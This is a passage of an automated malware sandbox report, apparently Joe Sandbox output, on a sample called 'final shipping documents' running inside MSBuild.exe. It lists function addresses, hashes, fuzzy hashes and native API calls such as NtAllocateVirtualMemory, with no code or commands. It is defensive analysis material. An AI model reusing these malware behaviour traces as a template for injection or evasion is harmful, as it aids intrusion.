API String ID: 4139908857-0
Opcode ID: 3c1640a4c3af16e8a99d257b09da44083136c9a7598dcddd449f70c20000e240
Instruction ID: afd505758f4fb39488c47fa60285dfefa308a81464b7915cabdbde25d73f24bf
Opcode Fuzzy Hash: 3c1640a4c3af16e8a99d257b09da44083136c9a7598dcddd449f70c20000e240
Instruction Fuzzy Hash: 40110FB6C006498FDB20CF9AD544BDEFBF4EB88324F15841AD418A7600D379A545CFA1

Function 00EFD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502393754.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_efd000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beed2edfe65ab35f12e87e8cd51da38822dd5d7a83c6528912328a728e8bc6cf
Instruction ID: 75fd2b51d5d9396f3ec77aef07eae76a4031d17f2109b716b67e93699c253e71
Opcode Fuzzy Hash: beed2edfe65ab35f12e87e8cd51da38822dd5d7a83c6528912328a728e8bc6cf
Instruction Fuzzy Hash: 0F212872508248DFDB15DF14DDC0B36BF66FB84318F20C569EA091F256C336D856DAA2

Function 00EFD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502393754.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_efd000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77305d3249d5c79e97d5dcad52423c176bd8767c7ae41964a219c1597e0f8e40
Instruction ID: 732a6cd9c3bcc476a4b90e7e5480f6ddde2b90c4857a8a58b35567cb331e9a9b
Opcode Fuzzy Hash: 77305d3249d5c79e97d5dcad52423c176bd8767c7ae41964a219c1597e0f8e40
Instruction Fuzzy Hash: F1210672508208DFDB14DF14DDC0B26BF66FB94328F20C569EA095F256C336E856CAA2

Function 00F0D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502966338.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c17593e98c6cab86987ee17d9974cf3cfeaf09d9859c140aa1d241a59302b5
Instruction ID: e654e1cbbfd06fec13698e0575c1cf489b453f7659ae1c2181fc51006ce0bfcd
Opcode Fuzzy Hash: 05c17593e98c6cab86987ee17d9974cf3cfeaf09d9859c140aa1d241a59302b5
Instruction Fuzzy Hash: F5210472904304EFDB15DFA4D9C0B26BBA5FB84324F20C56DE8094F2D2C336D846EA62

Function 00F0D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502966338.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4278bd0e1dce90c3c528a78c6b4c6824fe850fd87e9f7bc794705b974b22674a
Instruction ID: b837ece48b8c3d971551d75a4c2e97f3f97be58963f0ce36337d11070483e869
Opcode Fuzzy Hash: 4278bd0e1dce90c3c528a78c6b4c6824fe850fd87e9f7bc794705b974b22674a
Instruction Fuzzy Hash: B021D372A04200EFDB14DF64D984B16BB65EB84324F20C56DE80E4B2DAC336D847EA62

Function 00F0D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502966338.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22eb7edd1e4c89aa1a94219320b5a80f1762a14e94abd1920ef7d0c73bf4eb11
Instruction ID: f89e2e884471d83b62817bcb146c356281d14b984efe5d9daf330f31a26f616c
Opcode Fuzzy Hash: 22eb7edd1e4c89aa1a94219320b5a80f1762a14e94abd1920ef7d0c73bf4eb11
Instruction Fuzzy Hash: D3218E755093809FCB12CF24D990715BF71EB46324F28C5EAD8498F6A7C33A980ADB62

Function 00EFD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502393754.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_efd000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: d3d6ed4ccaf4acfa405253687676da41a56e82f86f8042e98d1f30a8055c6b96
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: AD110372404284DFCF15CF10D9C0B26BF72FB84328F24C6A9D9090B656C336D85ACBA2

Function 00EFD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502393754.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_efd000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: 1a9b1f9ce072e32c51fdd2a3d8b6902a1dc1503f2b492f7243ebddc1e5026403
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: E61103B2404244DFCB15CF00D9C0B26BF72FB94324F24C6A9D9090B656C33AE856CBA2

Function 00F0D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502966338.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 8bdbc3c44cd71c9c411e1b588f95ac17f2a67f11d2377db3ffb2d87b69d06ad3
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: D011BB75904280DFCB15CF54D9C0B15FBA1FB84324F24C6A9D8494B696C33AD80ADB62

Non-executed Functions

Function 07014590 Relevance: 1.6, Strings: 1, Instructions: 338COMMON

Download Yara Rule

Strings

Xq, xrefs: 07014848

Memory Dump Source

Source File: 00000000.00000002.1509057105.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7010000_final shipping documents.jbxd

Similarity

API ID:
String ID: Xq
API String ID: 0-599127549
Opcode ID: 67d63f36f81f7701b1768a67032cd1d163b2c35cf2691c90ac082aecf267cb6d
Instruction ID: 26e0307ef538b9a39bbd1f943384c484346f2870e1a8040e5e2bdc714be7785c
Opcode Fuzzy Hash: 67d63f36f81f7701b1768a67032cd1d163b2c35cf2691c90ac082aecf267cb6d
Instruction Fuzzy Hash: 66C17DB57002858FDB54DF69C988A6E7BE6AF89710F1642A9F806DB3B1CB30DC41CB51

Function 07004B20 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

4'q, xrefs: 07004C02

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 3c3589e2040c81e3f07a3cdbe757605b8db19223e2725135def12f031f51c48c
Instruction ID: 7d88573a228d50d9efaf95ade10dad72cc415f8b1e9d3d437509172ee2cf1560
Opcode Fuzzy Hash: 3c3589e2040c81e3f07a3cdbe757605b8db19223e2725135def12f031f51c48c
Instruction Fuzzy Hash: 44612D71D116488FEB48DF7AE855B9E7FF2BBC8301F04C12AE104EB259EB3059069B55

Function 07004B30 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'q, xrefs: 07004C02

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 4d48e58122ef083c07ce678d241e194265744b23c0992ba597878b3fc1e62483
Instruction ID: f7707cb324a9908ae8f0b73eeff986db3005712d4142b17c4a28d1496adcaef7
Opcode Fuzzy Hash: 4d48e58122ef083c07ce678d241e194265744b23c0992ba597878b3fc1e62483
Instruction Fuzzy Hash: 6E611D70D116488FEB48DF7AE855A9E7FF2BBC8301F04C12AE004EB269EB305906DB45

Function 0700D620 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97cc76a328d59287cc63c0ecd0f0fb6bc1ab6382fd4d4b5c1646fd0492750f25
Instruction ID: 74485ecde8be5b85f5bdc9649c02e962098e52729b58424cc3eff88de908288b
Opcode Fuzzy Hash: 97cc76a328d59287cc63c0ecd0f0fb6bc1ab6382fd4d4b5c1646fd0492750f25
Instruction Fuzzy Hash: 89E109B4E102598FDB14DF99C584AAEFBF2FF89310F248269D815AB355D730A941CFA0

Function 0700F100 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7361a9c251a85385d3e83708d4566e1a99af22f8aba189d6476b55ca26879009
Instruction ID: 34e1446b5f2bd576560749db3a0a3aac4437fd24c6e4efd7fba3488842adbed4
Opcode Fuzzy Hash: 7361a9c251a85385d3e83708d4566e1a99af22f8aba189d6476b55ca26879009
Instruction Fuzzy Hash: C1E11BB4E0021A8FDB24DFA9C584AAEBBF2FF49315F248159D814AB355C730AD41DFA0

Function 0700DA58 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791771c459a8d4de95dbbe5fb208e2d87b93086afca8e1ea8dc4b8f369d91b58
Instruction ID: 3b95f374b217d11270300df472336d9c8b8d96ea7192fc3343999a09bcd33db9
Opcode Fuzzy Hash: 791771c459a8d4de95dbbe5fb208e2d87b93086afca8e1ea8dc4b8f369d91b58
Instruction Fuzzy Hash: 4CE118B4E002598FDB14DFA9C580AAEBBF2FF89315F248269D815AB355C7309D41CFA0

Function 0700FAB0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86528e080edc811ae20dfb56d144e87c9997b75b2a3d4bbca18aeb4d3d7eb91
Instruction ID: 2a832bfc4a627dc41bb6ee5fbeb22db614aaa5b988ecff5c7289b48ab9ebbee9
Opcode Fuzzy Hash: f86528e080edc811ae20dfb56d144e87c9997b75b2a3d4bbca18aeb4d3d7eb91
Instruction Fuzzy Hash: 9EE11BB4E0025A8FDB24DF99C584AAEBBF2FF49314F248159D815AB355C730AD42DFA0

Function 00F9E0CC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a04b40766f929d45d525f84987646e33c2d8ab5fc73ef32d937e829d453370d6
Instruction ID: a3f73d0c68d8851e1df02efad7daf16ba6a72d3511adc42c5662996879b03b77
Opcode Fuzzy Hash: a04b40766f929d45d525f84987646e33c2d8ab5fc73ef32d937e829d453370d6
Instruction Fuzzy Hash: 91A17E32E002099FDF09DFB4C8845AEB7B2FF85300B15857AE805AB265DB75E95ADF40

Function 07005D40 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168d089ba7d0972a6aa2c418c269e15bd71b0e47d2984b66b1a80ba6570e3b2b
Instruction ID: 72cac797df6ddb22151e27b8636e98b551d5e804843903204d0a374db1b78dd3
Opcode Fuzzy Hash: 168d089ba7d0972a6aa2c418c269e15bd71b0e47d2984b66b1a80ba6570e3b2b
Instruction Fuzzy Hash: 139108B0D15219CFEB24CFA5D848BEDBBB6FF4A310F10816AD429A7291DB744995CF80

Function 0700F0F1 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e2da0c51718a8373ca61748282ae5d0e71b32d94fefb55a1de9d68fbdaaf6f
Instruction ID: fbd75245148f3c1bafb4929342157c6e6ce98d2acb69cf73a73368349b758ab1
Opcode Fuzzy Hash: 28e2da0c51718a8373ca61748282ae5d0e71b32d94fefb55a1de9d68fbdaaf6f
Instruction Fuzzy Hash: 5B510CB4E0421A8FDB14DFA9C5845AEFBF2FF89311F248169D418A7355D730A941CFA1

Analysis Process: MSBuild.exePID: 6156, Parent PID: 3628COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.8%
Total number of Nodes:	548
Total number of Limit Nodes:	72

Executed Functions

Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415

Strings

bMA, xrefs: 0041A3F2, 0041A400
bMA, xrefs: 0041A40D, 0041A414
!JA, xrefs: 0041A3EC, 0041A3F8

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95

Function 0041A31B Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e854bda4c8ffc7a545f0fa1354872165e9ca619cff1b1dff18116eccacdb2e5c
Instruction ID: 843ed695e50a36f3005de0b6640789ce179117e1bd0c38b56b8052d49bf53f0c
Opcode Fuzzy Hash: e854bda4c8ffc7a545f0fa1354872165e9ca619cff1b1dff18116eccacdb2e5c
Instruction Fuzzy Hash: 3001B2B2211108AFCB08DF99DC85EEB77A9AF8C754F158249FA0D97241C630E8518BA4

Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Function 0041A4FF Relevance: 1.5, APIs: 1, Instructions: 27
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f45946b05a1dd7d052a3d9b6a11d98c611a3919fd67080911be21ade4fe0f789
Instruction ID: 017ad903feb3531cfc01750c973c23e044ee790ddf7460f9de04a0f8c24ecf1a
Opcode Fuzzy Hash: f45946b05a1dd7d052a3d9b6a11d98c611a3919fd67080911be21ade4fe0f789
Instruction Fuzzy Hash: DAF039B6204149ABCB14DF99DC84CA777A9FF88324B15865AF94997202C634E865CBA0

Function 0041A44B Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d3d262518f34281f0e577afdfc2171d9aadb620eb04ab38b03f22fa21ed5c3ce
Instruction ID: eb9f6bd40963156d82049b5c65ce28109efdb37e11e6bc60a87de4852ffb79c9
Opcode Fuzzy Hash: d3d262518f34281f0e577afdfc2171d9aadb620eb04ab38b03f22fa21ed5c3ce
Instruction Fuzzy Hash: 68E0C276200210ABD721EBA8CC44ED77B68EF44374F05459DB9989B282C230E600C7E0

Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0

Function 01AA2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2BFA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 536889fc7cf8ff0ee23c24468e4c219b6b4a6e24707f21aeaf78b6bd5fdc1e59
Instruction ID: 93d351b83ca47dfaeee71008e843723640bcd119b0c137a1d191f8e94f7d7aab
Opcode Fuzzy Hash: 536889fc7cf8ff0ee23c24468e4c219b6b4a6e24707f21aeaf78b6bd5fdc1e59
Instruction Fuzzy Hash: B890023120144802D180715C484468A000D97D1301F96C019A0026654ECA198B597BA1

Function 01AA2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2B6A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 51199d5364d9a30384770360544c4f22e27e601116126535c349ed389caf5696
Instruction ID: 516fad8f8973b5e08ded22bff2f05de49959c11b1069cfc503c5b8a53ee85686
Opcode Fuzzy Hash: 51199d5364d9a30384770360544c4f22e27e601116126535c349ed389caf5696
Instruction Fuzzy Hash: A9900261202440034105715C4854656400E97E0201F56C025E1015590EC52989916625

Function 01AA2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2ADA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e478100f42748ada9efe04ddd92a27a445cb69717a6cbfdf20ae72f754c27541
Instruction ID: e7302341fbd550da83abcac7c4b64ab619ba46c2fc2fb90efb8b5d1e2c68b169
Opcode Fuzzy Hash: e478100f42748ada9efe04ddd92a27a445cb69717a6cbfdf20ae72f754c27541
Instruction Fuzzy Hash: 3A900435311440030105F55C0F44547004FD7D5351757C035F1017550DD735CD715731

Function 01AA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2DFA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92a63e4e03e30a82005f24c892bf558fd772491fddafe6658095c17382d765c6
Instruction ID: d6b5dab79b8193b45f683b19a756e2906322dd07e9826d3e919b054f7ee7c573
Opcode Fuzzy Hash: 92a63e4e03e30a82005f24c892bf558fd772491fddafe6658095c17382d765c6
Instruction Fuzzy Hash: AC90023120144413D111715C4944747000D97D0241F96C416A0425558ED65A8A52A621

Function 01AA2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2DDA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0185995985d861a85e48da614ab6094220651c86037094e312868bfb73d7c6a
Instruction ID: 41d6bf30a1c0c9979d4e00017fe2f26e6cafa4a6cb412409b65f5871b7a989ac
Opcode Fuzzy Hash: c0185995985d861a85e48da614ab6094220651c86037094e312868bfb73d7c6a
Instruction Fuzzy Hash: 66900221242481525545B15C4844547400EA7E0241B96C016A1415950DC52A9956DB21

Function 01AA2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2D3A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b02e6f3047437b6bb0f3b06a63e8947e3558a37b4fb28882bcdc262d4f6a0d7
Instruction ID: feb3a9e11e55cd1bdeb857f3db31dbec48ab573225c3793b8a462ade4fb073d3
Opcode Fuzzy Hash: 3b02e6f3047437b6bb0f3b06a63e8947e3558a37b4fb28882bcdc262d4f6a0d7
Instruction Fuzzy Hash: 4C90022130144003D140715C5858646400DE7E1301F56D015E0415554DD91989565722

Function 01AA2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2D1A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
